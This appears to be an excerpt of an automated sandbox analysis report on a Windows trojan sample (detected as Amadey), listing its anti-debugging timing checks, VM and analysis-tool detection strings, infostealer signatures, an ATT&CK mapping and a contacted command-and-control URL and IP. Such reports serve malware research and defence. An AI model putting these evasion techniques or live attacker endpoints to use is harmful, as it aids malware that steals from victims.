Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70805B9 second address: 7080609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD934BC97DEh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD934BC97DEh 0x00000016 add ch, FFFFFFC8h 0x00000019 jmp 00007FD934BC97DBh 0x0000001e popfd 0x0000001f mov dx, si 0x00000022 popad 0x00000023 mov eax, 00000001h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD934BC97DCh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080609 second address: 708060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 708060F second address: 7080620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080620 second address: 7080663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lock cmpxchg dword ptr [esi], ecx 0x0000000f jmp 00007FD934C4561Eh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a mov dl, cl 0x0000001c popad 0x0000001d cmp ecx, 01h 0x00000020 pushad 0x00000021 call 00007FD934C4561Bh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080663 second address: 70806A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edi, 78C3478Ah 0x0000000a popad 0x0000000b jne 00007FD9A518B736h 0x00000011 jmp 00007FD934BC97E1h 0x00000016 pop edi 0x00000017 pushad 0x00000018 mov ecx, 35879163h 0x0000001d mov eax, 17D7E0BFh 0x00000022 popad 0x00000023 pop esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD934BC97E1h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70402F3 second address: 70403A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 64D9h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD934C4561Eh 0x00000012 adc ax, 1D68h 0x00000017 jmp 00007FD934C4561Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FD934C45626h 0x00000024 and cx, 6FC8h 0x00000029 jmp 00007FD934C4561Bh 0x0000002e popfd 0x0000002f movzx eax, di 0x00000032 popad 0x00000033 popad 0x00000034 mov dword ptr [esp], ebp 0x00000037 pushad 0x00000038 jmp 00007FD934C45621h 0x0000003d pushfd 0x0000003e jmp 00007FD934C45620h 0x00000043 sbb eax, 5423B558h 0x00000049 jmp 00007FD934C4561Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov ebp, esp 0x00000052 pushad 0x00000053 jmp 00007FD934C4561Bh 0x00000058 popad 0x00000059 xchg eax, ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jmp 00007FD934C4561Bh 0x00000062 mov di, si 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7040425 second address: 704042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 704042B second address: 704042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 704042F second address: 7040442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov cx, 8975h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7040442 second address: 7040448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7040448 second address: 704044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70401FE second address: 7040218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45626h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7040218 second address: 7040251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD934BC97E6h 0x0000000f push eax 0x00000010 jmp 00007FD934BC97DBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7040251 second address: 7040257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7040257 second address: 7040287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007FD934BC97E4h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FD934BC97DAh 0x00000018 pop ecx 0x00000019 push edx 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7040062 second address: 7040078 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, E2A8h 0x0000000b popad 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, 3AE0259Fh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD01DC second address: 6FD01E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD01E0 second address: 6FD01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD01EE second address: 6FD01F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD01F2 second address: 6FD01F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD01F6 second address: 6FD01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD01FC second address: 6FD023F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD934C45622h 0x00000008 pushfd 0x00000009 jmp 00007FD934C45622h 0x0000000e adc si, 8278h 0x00000013 jmp 00007FD934C4561Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD023F second address: 6FD0296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, di 0x00000010 pushfd 0x00000011 jmp 00007FD934BC97E7h 0x00000016 xor esi, 2AF3444Eh 0x0000001c jmp 00007FD934BC97E9h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD0430 second address: 6FD043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD043F second address: 6FD0457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0EAD second address: 6FC0ED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FD934C45623h 0x00000012 mov bx, si 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0ED9 second address: 6FC0F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD934BC97DDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0F03 second address: 6FC0F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 69D71CA2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD0019 second address: 6FD0023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 69CB3B62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD0023 second address: 6FD0038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD934C4561Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD0038 second address: 6FD0064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD934BC97DFh 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD934BC97DDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD0064 second address: 6FD0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD0068 second address: 6FD006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD006E second address: 6FD008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD934C4561Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD008E second address: 6FD0092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD0092 second address: 6FD0098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FD0098 second address: 6FD00A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FE0BD3 second address: 6FE0BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C4561Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FE0BE4 second address: 6FE0C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FE0C02 second address: 6FE0C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FE0C06 second address: 6FE0C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FE0C0C second address: 6FE0C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FE0C12 second address: 6FE0C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSpecial instruction interceptor: First address: 99F9EB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSpecial instruction interceptor: First address: B46D2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSpecial instruction interceptor: First address: B4E9A0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSpecial instruction interceptor: First address: BCC849 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00459980 rdtsc 0_2_00459980
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe TID: 7932Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0027255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0027255D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002729FF
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0027255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0027255D
Source: 5Jat5RkD3a.exe, 5Jat5RkD3a.exe, 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 5Jat5RkD3a.exeBinary or memory string: Hyper-V RAW
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 5Jat5RkD3a.exe, 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 5Jat5RkD3a.exe, 00000000.00000002.1560405942.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538068178.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1537557313.00000000017D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5Jat5RkD3a.exe, 00000000.00000003.1489699515.0000000006891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0700068D Start: 070007E8 End: 070007E20_2_0700068D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_070006C9 Start: 070007E8 End: 070007E20_2_070006C9
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile opened: NTICE
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile opened: SICE
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00459980 rdtsc 0_2_00459980
Source: 5Jat5RkD3a.exe, 5Jat5RkD3a.exe, 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: gProgram Manager
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49702 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
5Jat5RkD3a.exe49%VirustotalBrowse
5Jat5RkD3a.exe53%ReversingLabsWin32.Trojan.Amadey
5Jat5RkD3a.exe100%AviraTR/Crypt.TPM.Gen
5Jat5RkD3a.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850true
        		unknown
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.html5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtd5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#5Jat5RkD3a.exefalse
                		high
                http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=5Jat5RkD3a.exe, 00000000.00000002.1560405942.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538068178.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1537557313.00000000017D3000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://httpbin.org/ipbefore5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850se5Jat5RkD3a.exe, 00000000.00000002.1560049226.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://curl.se/docs/http-cookies.html5Jat5RkD3a.exe, 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://curl.se/docs/hsts.html#5Jat5RkD3a.exefalse
                          		high
